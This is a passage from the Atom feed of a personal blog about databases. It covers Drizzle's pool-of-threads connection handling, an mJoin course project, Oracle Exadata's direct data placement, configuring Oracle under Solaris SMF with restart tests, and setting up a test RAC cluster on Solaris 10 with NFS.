Of all the keynote speakers, the one I most looking forward to hearing is&lt;a href="http://en.wikipedia.org/wiki/Andy_Bechtolsheim"&gt; Andy Bechtolsheim&lt;/a&gt;'s. Also, I'll be at the &lt;a href="http://drizzle.org/wiki/Drizzle_Developer_Day_2009"&gt;Drizzle developer day&lt;/a&gt; on the Friday at Sun and am looking forward to meeting all of the Drizzle team.
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/04/14/mysql-user-conference.html</feedburner:origLink></entry>
 
 <entry>
   <title>Connection Handling in Drizzle</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/GJe4P1JWP6s/connection-handling-in-drizzle.html" />
   <updated>2009-03-07T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2009/03/07/connection-handling-in-drizzle</id>
   <content type="html">A few weeks ago I was reading the paper &lt;a href="http://db.cs.berkeley.edu/papers/fntdb07-architecture.pdf" target="_blank"&gt;Anatomy of a Database System&lt;/a&gt; by Hellerstein and Stonebraker. Chapter 2 of that paper discusses process models in database systems. After reading that paper, I was interested in seeing what Drizzle does in this regard so I began looking at the source code to see. Essentially, Drizzle uses the thread per DBMS worker model that is outlined in the paper where a single multi-threaded process hosts all the DBMS worker activity. Drizzle also has the concept of a pool of threads where workers are miltiplexed over a thread pool. The really nice thing about Drizzle in this regard is that the code for implementing the pool of threads is a plugin so if anyone is interested in writing their own thread scheduler, they can simply write a plugin for it. While developing an efficient scheduler might be a challenge, the mechanism for writing a plugin is pretty easy. I think that's pretty cool.&lt;br&gt;

Let's discuss how a client connectection is made to Drizzle and a query is executed. I'll provide a general overview first and then delve into more details. When the Drizzle server is started, a pool of threads is created. The intial MySQL worklog for the implementation of the thread pool mechanism can be found &lt;a href="http://forge.mysql.com/worklog/task.php?id=441" target="_blank"&gt;here&lt;/a&gt;. The number of threads in this pool can be specified by an administrator. The pthreads API is used for the creation of threads in Drizzle. The thread pool code also utilizes the &lt;a href="http://www.monkey.org/~provos/libevent/" target="_blank"&gt;libevent&lt;/a&gt; API which provides a mechanism to execute a callback function when a specific event occurs on a file descriptor. During the initialization of the thread pool, 2 callback functions are registered with libevent. These callback functions are to be executed whenever a session is added or killed. Each thread created during the thread pool initialization process has a thread body which waits for a session to process using libevent. When a new connection comes in, the thread pool code adds it to a queue for libevent processing. When a libevent callback function is invoked (more information about how and when this happens below), a session is removed from the queue and placed in one of two lists depending on the current state of the session - if the session is waiting for I/O it will be added a list indicating that; otherwise, if it is ready for processing, it will be added to a list indicating this. The body of each thread creating during the thread pool initialization is continuously running a loop which looks at the list of sessions that need processing. Whenever a session is added to that list, a thread will pop it from the list and process it. This thread will then go ahead and actually execute the command which the session wants to execute.&lt;br&gt;

Now, lets delve just a little bit further into how client connections are made based on the short summary given in the previous paragraph. I'll reference relevant files and methods in the &lt;a href="http://drizzle.org/doxygen/" target="_blank"&gt;Drizzle Doxygen docs &lt;/a&gt;as I go along when possible. The first thing we'll look at is the main() method of the server which is executed when the server starts. This method is contained in &lt;a href="http://drizzle.org/doxygen/d2/d35/drizzled_8cc-source.html" target="_blank"&gt;drizzled.cc&lt;/a&gt;. After initializing various things, the handle_connections_sockets() method is called. This method is also in the drizzled.cc file and its purpose is to handle new connections and spawn new threads to handle them. This method contains a while loop which continuously executes during the lifetime of the server waiting for new connections to come in to the server. Within this loop, a poll() system call is performed. The &lt;a href="http://linux.die.net/man/2/poll" target="_blank"&gt;poll() system call&lt;/a&gt; waits for an event on a file descriptor to occur. In this case, the event will be a new connection. When a new connection comes in, accept() is called to accept a connection on a socket and create a new connected socket. In the drizzled.cc file, this new socket is called new_sock (funnily enough!). Once error checking on the new socket is complete, a new &lt;a href="http://drizzle.org/doxygen/de/d41/classSession.html" target="_blank"&gt;Session&lt;/a&gt; object is allocated. If this allocation fails, then the server has reached a limit on the number of sessions that can occur. If no error occurs then the new Session object is passed as a parameter to the create_new_thread() method (also in the drizzled.cc file).&lt;br&gt;

The create_new_thread() method creates a new thread to handle the incoming connection. It is in this method that control actually enters the thread pool code. This occurs when the thread_scheduler.add_connection() method is called. thread_scheduler is a struct of type &lt;a href="http://drizzle.org/doxygen/de/d03/plugin__scheduling_8h-source.html" target="_blank"&gt;scheduling_st&lt;/a&gt; that defines the interface the scheduler plugin. When add_connection() is called on the thread_scheduler struct it calls the add_connection() function in whichever scheduler plugin is currently loaded. Since we are talking about the thread pool plugin, it will call the add_connection() function in the &lt;a href="http://drizzle.org/doxygen/d9/d0a/pool__of__threads_8cc-source.html" target="_blank"&gt;pool_of_threads.cc&lt;/a&gt; file. The add_connection() method notifies the thread pool about a new connection. A new session_scheduler object is created for that new connection. The session_scheduler class is defined in the &lt;a href="http://drizzle.org/doxygen/d8/d9a/session__scheduler_8h-source.html" target="_blank"&gt;session_scheduler.h&lt;/a&gt; file. This scheduler is set as the scheduler for the Session object that was passed as a parameter to the create_new_thread() method. Next, the libevent_session_add() method is called with the Session object passed as a parameter.&lt;br&gt;

The libevent_session_add() method adds the Session object to a queue for libevent processing. It signals libevent by writing a byte into the session_add pipe which will trigger the callback function libevent_add_session_callback(). This callback function pops the first Session object off the queue of objects waiting for libevent processing and adds the Session object to one of two lists: 1) sessions_need_processing or 2) sessions_waiting_for_io. Which list the Session object is added to depends on the current state of the session. Once the libevent_add_session_callback() function completes, the adding of a new connection to the pool of threads is essentially complete. A session is chosen to be executed within the body of a thread runnning in the pool of threads. Each thread in the pool of threads is running with an outer loop that is defined in the libevent_thread_proc() method. Essentially, each thread in the pool of threads is running an infinite loop that examines the session_need_processing list. When the sessions_need_processing list becomes non-empty, a thread will pop the first Session object from that list and actually go ahead and process a query in that session.&lt;br&gt;

The above description is not meant to be exhaustive. Actually reading through the pool of threads code is not that difficult and a grasp of what the code is doing can be easily obtained in a short period of time. I mostly wrote this for my own purposes so I had a better understanding of how it works.&lt;br&gt;

While the thread pool code works well, it is not without issues. Mark Callaghan &lt;a href="http://mysqlha.blogspot.com/2009/01/no-new-global-mutexes-and-how-to-make.html" target="_blank"&gt;points out&lt;/a&gt; that when using the thread pool model in MySQL, every command sent to the server requires a pthread mutex lock/unlock pair on LOCK_event_loop. He has also logged a &lt;a href="http://bugs.mysql.com/bug.php?id=42288" target="_blank"&gt;bug&lt;/a&gt; for this. Brian Aker &lt;a href="http://krow.livejournal.com/631051.html" target="_blank"&gt;responded to Mark's comments&lt;/a&gt; by saying that to get rid of this lock, you essentially need to write your own solution. This is much easier to attempt with Drizzle due to its plugin architecture that I mentioned at the beginning of this post. As he says "We have abstracted out this problem now so you can focus on solving this problem if you want". I believe that the idea is that people can write/tune thread schedulers for their own workload since a generic scheduler will not work well for every workload. With this approach, people can easily write a scheduler which is uniquely suited to their workload.&lt;br&gt;

When it comes to the thread pool code, Brian also points out that the current design does not use libevent in the most optimal manner. He says "When it comes to pool of threads I think the current design misses the point of using libevent. Currently it does not yield on IO block, so in essence all it is doing it keeping you from overwhelming the operating system's scheduler and providing a completion for a given action. For small queries this is fine, but for longer running queries this is not very good (though... most queries we see are pretty short so this part is not a huge concern). It needs to be redesigned to make better use of IO, and this is something we will work on soon". Its interesting to see how &lt;a href="http://www.danga.com/memcached/" target="_blank"&gt;memcached&lt;/a&gt; uses libevent as an example of seeing how another multi-threaded application uses libevent. Steven Grimm gives a brief outline in this &lt;a href="http://monkeymail.org/archives/libevent-users/2007-January/000450.html" target="_blank"&gt;thread&lt;/a&gt; of how he implemented thread support in memcached. I know Brian is currently working on a multi-threaded scheduler for Drizzle which is almost complete. He has mentioned in the past that there is a need to design a scheduler which really understands the difference between high/low and time constrained queries. I believe this is an interesting issue to think about.&lt;br&gt;

In future posts, I hope to investigate the thread pool code more. In particular, I'd like to see how libevent could be used in a more optimal way and talk about some of the design considerations for a cost-based scheduler. Also, if I have time, I hope to write about how a query is processed in Drizzle i.e. what happens after connection handling.&lt;br&gt;
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/03/07/connection-handling-in-drizzle.html</feedburner:origLink></entry>
 
 <entry>
   <title>Semester Project</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/qGLIkbR6BEo/semester-project.html" />
   <updated>2009-02-20T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2009/02/20/semester-project</id>
   <content type="html">&lt;p&gt;This semester I&amp;#8217;m taking a &lt;a href='http://www.cs.umd.edu/class/spring2009/cmsc724/' target='_blank'&gt;course&lt;/a&gt; in database management systems. For this course, we have to work on a mini-research project in groups. I&amp;#8217;m in a group with 2 other students and the project we decided on was to perform an experimental evaluation of the &lt;a href='http://www.vldb.org/conf/2003/papers/S10P01.pdf' target='_blank'&gt;mJoin&lt;/a&gt; operator. This will involve surveying the prior work on the mJoin operator and performing an implementation of the operator in an open-source DBMS.&lt;/p&gt;

&lt;p&gt;The mJoin operator is essentially an n-ary symmetric hash join operator. For each relation to be joined, a hash table is built on each join attribute. Then for each new tuple, it is inserted into the appropriate hash table(s) and a probe is performed into the hash tables on the other relations. Intermediate tuples are never stored anywhere. One of the issues we will be investigating in this experimental evaluation is whether an operator like the mJoin is more or less efficient than a tree of binary joins. Conventional wisdom says that a tree of binary joins is typically more efficient.&lt;/p&gt;

&lt;p&gt;The first thing we will be doing in the next week or two is looking at various open-source databases and seeing which one would be most suited for us to work with for this project. Basically, the main criteria will be how easy the runtime engine is to work with and how easy it will be to add a new operator. We&amp;#8217;ll have a look at a lot of databases but at the moment, its looking like Postgresql is the one we will work with for the semester. We&amp;#8217;ll also be looking into any related work. The &lt;a href='http://www.cs.umd.edu/~amol/papers/fnt-aqp.pdf' target='_blank'&gt;survey&lt;/a&gt; on adaptive query processing looks like a good starting point for this.&lt;/p&gt;

&lt;p&gt;Some other interesting aspects of the mJoin operator which we hope to investigate are: &lt;ul&gt;
	&lt;li&gt;query optimization with the mJoin operator&lt;/li&gt;
	&lt;li&gt;what applications would benefit from an operator such as this&lt;/li&gt;
	&lt;li&gt;what kind of scenarios is the operator suited for (and not suited for)&lt;/li&gt;
	&lt;li&gt;how difficult it is to add the operator to an existing DBMS&lt;/li&gt;
&lt;/ul&gt; I&amp;#8217;ll try to post regularly throughout the semester on what we are up to and provide updates on what kind of progress we are making. In the meantime, besides working on this project, I&amp;#8217;m trying to contribute to &lt;a href='https://launchpad.net/drizzle' target='_blank'&gt;Drizzle&lt;/a&gt; in as many ways as I possibly can. I&amp;#8217;m mostly working on small bugs and performing some code cleanup tasks.&lt;/p&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2009/02/20/semester-project.html</feedburner:origLink></entry>
 
 <entry>
   <title>Drizzle: A Pretty Cool Project</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/Ih2L4Vg3IPk/drizzle-a-pretty-cool-project.html" />
   <updated>2009-01-28T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2009/01/28/drizzle-a-pretty-cool-project</id>
   <content type="html">&lt;a href="https://launchpad.net/drizzle"&gt;Drizzle&lt;/a&gt; is a pretty cool project whose progress I've started following in the last few weeks. I'm trying to contribute in a tiny way if I can by confirming bug reports. If I had more time, I'd like to try resolving some bugs. Hopefully, I'll find some spare time to do that in the future.&lt;br /&gt;&lt;br /&gt;I think its definitely a project worth keeping an eye on though. Check it out if you have the time.
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/01/28/drizzle-a-pretty-cool-project.html</feedburner:origLink></entry>
 
 <entry>
   <title>What is Direct Data Placement</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/Y89qOn-vurc/what-is-direct-data-placement.html" />
   <updated>2009-01-06T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2009/01/06/what-is-direct-data-placement</id>
   <content type="html">&lt;p&gt;I&amp;#8217;m currently studying Oracle&amp;#8217;s &lt;a href='http://www.oracle.com/technology/products/bi/db/exadata/pdf/exadata-technical-whitepaper.pdf'&gt;white paper&lt;/a&gt; on Exadata and came across the following paragraph:&lt;/p&gt;

&lt;p&gt;&amp;#8220;Further, Orace&amp;#8217;s interconnect protocol uses direct data placement (DMA - direct memory access) to ensure very low CPU overhead by directly moving data from the wire to database buffers with no extra data copies being made.&amp;#8221;&lt;/p&gt;

&lt;p&gt;This got me wondering what direct data placement is. First off, the interconnect protocol which Oracle uses in Exadata is &lt;a href='http://oss.oracle.com/projects/rds/'&gt;Reliable Datagram Sockets&lt;/a&gt; (RDSv3). The iDB (intelligent database protocol) that a database server and Exadata Storage Server software use to communicate is built on RDSv3.&lt;/p&gt;

&lt;p&gt;Now, I found some information on direct data placement in a number of RFCs; &lt;a href='http://www.ietf.org/rfc/rfc4096.txt'&gt;RFC 4296&lt;/a&gt;, &lt;a href='http://tools.ietf.org/html/rfc4297'&gt;RFC 4297&lt;/a&gt;, and &lt;a href='http://www.apps.ietf.org/rfc/rfc5041.html'&gt;RFC 5041&lt;/a&gt;. Of the 3 RFCs, I found RFC 5041 (Direct Data Placement over Reliable Transports) to be the most relevant (although they are all worth a quick look). RFC 5041 sums up direct data placement quite nicely:&lt;/p&gt;

&lt;p&gt;&amp;#8220;Direct Data Placement Protocol (DDP) enables an Upper Layer Protocol (ULP) to send data to a Data Sink without requiring the Data Sink to Place the data in an intermediate buffer - thus, when the data arrives at the Data Sink, the network interface can place the data directly into the ULP&amp;#8217;s buffer.&amp;#8221;&lt;/p&gt;

&lt;p&gt;The paragraph from Oracle&amp;#8217;s white paper makes much more sense to me now after briefly reading through the RFC. Since each InfiniBand link in Exadata provides 16 Gb of bandwidth, there would be a large amount of overhead if data had to be placed in an intermediate buffer. Thus, the use of direct data placement makes perfect sense since it reduces CPU overhead associated with copying data through intermediate buffers.&lt;/p&gt;

&lt;p&gt;Also, I believe that in the paragraph quoted from Oracle&amp;#8217;s white paper, it should be RDMA for Remote DIrect Memory Access.&lt;/p&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2009/01/06/what-is-direct-data-placement.html</feedburner:origLink></entry>
 
 <entry>
   <title>Semester Project Finally Finished</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/QzKIuC4qe0o/semester-project-finally-finished.html" />
   <updated>2008-12-16T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/12/16/semester-project-finally-finished</id>
   <content type="html">&lt;p&gt;We just finished our semester project yesterday for the class I am taking on High Performance Computing. It was a pretty interesting project based on the topic of software fault injection.&lt;/p&gt;

&lt;p&gt;More details can be found in the project report &lt;a href='http://www.ece.umd.edu/%7Eposulliv/714_fault_injection_writeup_final.pdf'&gt;here&lt;/a&gt;.&lt;/p&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2008/12/16/semester-project-finally-finished.html</feedburner:origLink></entry>
 
 <entry>
   <title>Configuring Oracle as a Service in SMF</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/NkzgcQet5x8/configuring-oracle-as-a-service-in-smf.html" />
   <updated>2008-11-30T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/30/configuring-oracle-as-a-service-in-smf</id>
   <content type="html">In Solaris 10, Sun introduced the Service Management Facility (SMF) to simplify management of system services. It is a component of the so called Predictive Self Healing technology available in Solaris 10. The other component is the Fault Management Architecture.&lt;br&gt;

In this post, I will demonstrate how to configure an Oracle database and listener as services managed by SMF. This entails that Oracle will start automatically on boot which means we don't need to go to the bother of writing a startup script for Oracle (even though its not really that hard, see Howard Roger's &lt;a href="http://www.dizwell.com/prod/node/235?page=0%2C2"&gt;10gR2 installation guide on Solaris&lt;/a&gt; for an example). A traditional startup script could still be created and placed appropriate &lt;code&gt;/etc/rc*.d&lt;/code&gt; directory. These scripts are referred to as legacy run services in Solaris 10 and will not benefit from the precise fault management provided by SMF.&lt;br&gt;

In this post, I am only talking about a single instance environment and I am not using ASM for storage. Also please note that this post is not an extensive guide on how to do this by any
means, it's just a short post on how to get it working. For more information on SMF and Solaris 10 in general, have a look through Sun's excellent online documentation at &lt;a href="http://docs.sun.com/"&gt;http://docs.sun.com&lt;/a&gt;.&lt;br&gt;

&lt;span style="font-weight: bold;"&gt;Adding Oracle as a Service&lt;/span&gt;&lt;br&gt;

To create a new service in SMF, a number of steps need to be performed (see the &lt;a href="http://www.sun.com/bigadmin/content/selfheal/sdev_intro.html"&gt;Solaris Service Management Facility - Service Developer Introduction&lt;/a&gt; for more details). Luckily for me, Joost Mulders has already done all the necessary work for performing this for Oracle. The package for
installing ora-smf is available from &lt;a href="http://joostm.nl/solaris/smf/ora-smf/ora-smf-1.5.pkg"&gt;here&lt;/a&gt;.&lt;br&gt;

To install this package, download it to an appropriate location (in my case, the root user's home directory) and perform the following:&lt;br&gt;

&lt;pre&gt;
# cd /var/svc/manifest/application
# mkdir database
# cd ~
# pkgadd -d orasmf-1.5.pkg
&lt;/pre&gt;

There is now some configuration which needs to be performed. Navigate to the /var/svc/manifest/application/database directory. The following files will be present there

&lt;pre&gt;
# ls -l
-r--r--r--   1 root     bin         2167 Apr 26 09:24 oracle-database-instance.xml
-r--r--r--   1 root     bin         5722 Dec 28  2005 oracle-database-service.xml
-r--r--r--   1 root     bin         2128 Apr 26 09:31 oracle-listener-instance.xml
-r--r--r--   1 root     bin         4295 Dec 28  2005 oracle-listener-service.xml
#
&lt;/pre&gt;

The two files which must be edited are:
&lt;ul&gt;
	&lt;li&gt;oracle-database-instance.xml&lt;/li&gt;
	&lt;li&gt;oracle-listener-instance.xml&lt;/li&gt;
&lt;/ul&gt;
My &lt;code&gt;oracle-database-instance.xml&lt;/code&gt; file looked like the following after I edited it according to my environment:

&lt;br&gt;
&lt;script src="http://gist.github.com/288466.js"&gt;&lt;/script&gt;
&lt;br&gt;

and my &lt;code&gt;oracle-listener-instance.xml&lt;/code&gt; file looked like so after editing:

&lt;br&gt;
&lt;script src="http://gist.github.com/288469.js"&gt;&lt;/script&gt;
&lt;br&gt;

In the above configuration files, you can see that I have an instance (orcl1) whose ORACLE_HOME is &lt;code&gt;/u01/app/oracle/product/10.2.0/db_1&lt;/code&gt;. I also have a resource project named oracle and the username and group which the Oracle software is installed as is oracle and dba respectively. The most important parameters which must be changed according to your environment are:

&lt;ul&gt;
	&lt;li&gt;ORACLE_HOME&lt;/li&gt;
	&lt;li&gt;ORACLE_SID&lt;/li&gt;
	&lt;li&gt;User&lt;/li&gt;
	&lt;li&gt;Group&lt;/li&gt;
	&lt;li&gt;Project&lt;/li&gt;
	&lt;li&gt;Working Directory (in my case, I set it to the same value as ORACLE_HOME)&lt;/li&gt;
	&lt;li&gt;Instance name (needs to be the same as the ORACLE_SID for the database and the listener name for the listener)&lt;/li&gt;
&lt;/ul&gt;

Once these modifications have been performed according to your environment, execute the following to bring the database and listener under SMF control:

&lt;pre&gt;
# svccfg import /var/svc/manifest/application/database/oracle-database-instance.xml
# svccfg import /var/svc/manifest/application/database/oracle-listener-instance.xml
&lt;/pre&gt;

Now, shut down the database and listener on the host (since this post presumes you are only configuring one database and listener, it shouldn't be too difficult to configure multiple instances though). Then execute the following to enable the database and listener as an SMF service and start the services:

&lt;pre&gt;
# svcadm enable svc:/application/oracle/database:orcl1
# svcadm enable svc:/application/oracle/listener:LISTENER
&lt;/pre&gt;

In the commands above, the database instance is orcl1 and the listener name is LISTENER. Log of this process are available in the /var/svc/log directory.

&lt;pre&gt;
# cd /var/svc/log
# ls -ltr application-*
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-management-webmin:default.log
-rw-r--r--   1 root     root         120 Apr 25 20:15 application-print-server:default.log
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-print-ipp-listener:default.log
-rw-r--r--   1 root     root          75 Apr 25 20:16 application-gdm2-login:default.log
-rw-r--r--   1 root     root         566 Apr 26 07:07 application-print-cleanup:default.log
-rw-r--r--   1 root     root         603 Apr 26 07:07 application-font-fc-cache:default.log
-rw-r--r--   1 root     root        3318 Apr 26 10:45 application-oracle-database:orcl1.log
-rw-r--r--   1 root     root        6847 Apr 26 10:47 application-oracle-listener:LISTENER.log
#
&lt;/pre&gt;

&lt;span style="font-weight: bold;"&gt;Testing Out SMF&lt;/span&gt;&lt;br&gt;

Now, to test out some of the functionality of SMF, I'm going to kill the pmon process of the orcl1 database instance. SMF should automatically restart the instance.

&lt;pre&gt;
# ps -ef | grep pmonoracle  
5113     1   0 10:19:22 ?           0:01 ora_pmon_orcl1
# kill -9 5113
&lt;/pre&gt;

Roughly 10 to 20 seconds later, the database came back up. Looking at the &lt;code&gt;application-oracle-database:orcl1.log&lt;/code&gt; file, we can see what happened:

&lt;pre&gt;
[ Apr 26 10:44:52 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:44:52 Executing stop method ("/lib/svc/method/ora-smf stop database orcl1")]
**********************************************************************
********************************************************************** 
some of '^ora_(lgwr|dbw0|smon|pmon|reco|ckpt)_orcl1' died.
** Aborting instance orcl1.
*********************************************************************
*********************************************************************
ORACLE instance shut down.
[ Apr 26 10:44:53 Method "stop" exited with status 0 ]
[ Apr 26 10:44:53 Executing start method ("/lib/svc/method/ora-smf start database orcl1") ]
ORACLE instance started.
Total System Global Area  251658240 bytes
Fixed Size                  1279600 bytes
Variable Size              83888528 bytes
Database Buffers          163577856 bytes
Redo Buffers                2912256 bytes
Database mounted.
Database opened.
database orcl1 is OPEN.
[ Apr 26 10:45:05 Method "start" exited with status 0 ]
&lt;/pre&gt;

As can be seen from the content of my log file above, SMF discovered that the instance crashed and restarted it automatically. That seems pretty cool to me!&lt;br&gt;

Now, let's try out the same procedure with the listener service.&lt;br&gt;


Almost instantaneously, the listener came back up. Looking through the &lt;code&gt;application-oracle-listener:LISTENER.log&lt;/code&gt; file shows us what SMF did:

&lt;pre&gt;
[ Apr 26 10:47:50 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:47:50 Executing stop method ("/lib/svc/method/ora-smf stop listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:51

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
[ Apr 26 10:47:52 Method "stop" exited with status 0 ]
[ Apr 26 10:47:52 Executing start method ("/lib/svc/method/ora-smf start listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:52

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Starting /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait...

TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
System parameter file is /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
Start Date                26-APR-2007 10:47:54
Uptime                    0 days 0 hr. 0 min. 0 sec
Trace Level               off
Security                  ON: Local OS Authentication
SNMP                      OFF
Listener Parameter File   /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Listener Log File         /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
listener LISTENER start succeeded
[ Apr 26 10:47:54 Method "start" exited with status 0 ]
&lt;/pre&gt;

I havn't really played around too much else with SMF and Oracle at the moment. Obviously, Oracle has a lot of this functionality already available through Enterprise Manager using corrective actions.&lt;br&gt;

Also, its worth pointing out that Oracle does not currently support SMF and does not provide any information or documentation on configuring Oracle with SMF. Metalink Note 398580.1 and Bug 5340239 have more information on this from Oracle.
</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/30/configuring-oracle-as-a-service-in-smf.html</feedburner:origLink></entry>
 
 <entry>
   <title>srvctl Error in Solaris 10 RAC Environment</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/aO4_g-du-bg/srvctl-error-in-solaris-10-rac-environment.html" />
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/29/srvctl-error-in-solaris-10-rac-environment</id>
   <content type="html">&lt;p&gt;If you install a RAC environment on Solaris 10 and set kernel parameters using resource control projects (which is the recommended method in Solaris 10), then you will likely encounter issues when trying to start the cluster database or an individual instance using the &lt;code&gt;srvctl&lt;/code&gt; utility. As an example, this is likely what you will encounter:&lt;/p&gt;
&lt;pre&gt;
$ srvctl start instance -d orclrac -i orclrac2
PRKP-1001 : Error starting instance orclrac2 on node nap-rac02
CRS-0215: Could not start resource 'ora.orclrac.orclrac2.inst'.
$
&lt;/pre&gt;
&lt;p&gt;along with the following messages in the alert log&lt;/p&gt;
&lt;pre&gt;
Tue Apr 24 11:36:21 2007
Starting ORACLE instance (normal)
Tue Apr 24 11:36:21 2007
WARNING: EINVAL creating segment of size 0x0000000024802000
fix shm parameters in /etc/system or equivalent
&lt;/pre&gt;
&lt;p&gt;This is because the &lt;code&gt;srvctl&lt;/code&gt; utility is unable to get the correct shared memory related settings using &lt;code&gt;prctl&lt;/code&gt; as it reads the settings from the &lt;code&gt;/etc/system&lt;/code&gt; file. This is documented in bug 5340239 on Metalink.&lt;/p&gt;

&lt;p&gt;The only workaround for this at the moment (that I know of) is to manually add the necessary shm parameters to the &lt;code&gt;/etc/system&lt;/code&gt; file, for example:&lt;/p&gt;
&lt;pre&gt;
set semsys:seminfo_semmni=100
set semsys:seminfo_semmsl=256
set shmsys:shminfo_shmmax=4294967295
set shmsys:shminfo_shmmni=100
&lt;/pre&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/29/srvctl-error-in-solaris-10-rac-environment.html</feedburner:origLink></entry>
 
 <entry>
   <title>Oracle 10gR2 RAC with Solaris 10 and NFS</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/1bWAE55yFwE/oracle-10gr2-rac-with-solaris-10-and-nfs.html" />
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/29/oracle-10gr2-rac-with-solaris-10-and-nfs</id>
   <content type="html">Recently, I setup a 2 node RAC environment for testing using Solaris 10 and NFS. This environment consisted of 2 RAC nodes running Solaris 10 and a Solaris 10 server which served as my NFS filer.
&lt;br&gt;

I thought it might prove useful to create a post on how this is achieved as I found it to be a relatively quick way to setup a cheap test RAC environment. Obviously, this setup is not supported by Oracle and should only be used for development and testing purposes.
&lt;br&gt;

This post will only detail the steps which are specific to this setup; meaning I wont talk about a number of steps which need to be performed such as setting up user equivalence and creating the database. I will mention when these steps should be performed but I point you to &lt;a href="http://www.oracle.com/technology/pub/articles/hunter_rac10gr2_iscsi.html"&gt;Jeffrey Hunter's article &lt;/a&gt;on building a 10gR2 RAC on Linux with iSCSI for more information on steps like this.

&lt;h2&gt;Overview of the Environment&lt;/h2&gt;

Here is a diagram of the architecture used which is based on Jeff Hunter's diagram from the previously mentioned article (click on the image to get a larger view):
&lt;br&gt;

&lt;a href="../../../images/rac2.jpg"&gt;&lt;img style="270px;" src="../../../images/rac2.jpg" border="0" alt="" /&gt;&lt;/a&gt;
&lt;br&gt;

You can see that I am using an external hard drive attached to the NFS filer for storage. This external hard drive will hold all my database and Clusterware files.
&lt;br&gt;

Again, the hardware used is the exact same as the hardware used in Jeff Hunter's article. Notice however that I do not have a public interface configured for my NFS filer. This is mainly because I did not have any spare network interfaces lying around for me to use!

&lt;h2&gt;Getting Started&lt;/h2&gt;

To get started, we will install Solaris 10 for the x86 architecture on all three machines. The ISO images for Solaris 10 x86 can be downloaded from Sun's website &lt;a href="http://www.sun.com/software/solaris/get.jsp"&gt;here&lt;/a&gt;. You will need a Sun Online account to access the downloads but registration is free and painless.
&lt;br&gt;

I won't be covering the Solaris 10 installation process here but for more information, I refer you to the official Sun basic installation guide found &lt;a href="http://docs.sun.com/app/docs/doc/817-0544/6mgbagb19?a=view"&gt;here&lt;/a&gt;.
&lt;br&gt;

When installing Solaris 10, make sure that you configure both network interfaces. Ensure that you do not use DHCP for either network interface and specify all the necessary details for your environment.
&lt;br&gt;

After installation, you should update the &lt;code&gt;/etc/inet/hosts&lt;/code&gt; file on all hosts. For my environment as shown in the diagram above, my &lt;code&gt;hosts&lt;/code&gt; file looked like the following:

&lt;pre&gt;
#
# Internet host table
#
127.0.0.1 localhost

# Public Network - (pcn0)
172.16.16.27 solaris1
172.16.16.28 solaris2

# Private Interconnect - (pcn1)
192.168.2.111 solaris1-priv
192.168.2.112 solaris2-priv

# Public Virtual IP (VIP) addresses for - (pcn0)
172.16.16.31 solaris1-vip
172.16.16.32 solaris2-vip

# NFS Filer - (pcn1)
192.168.2.195 solaris-filer
&lt;/pre&gt;
&lt;br&gt;
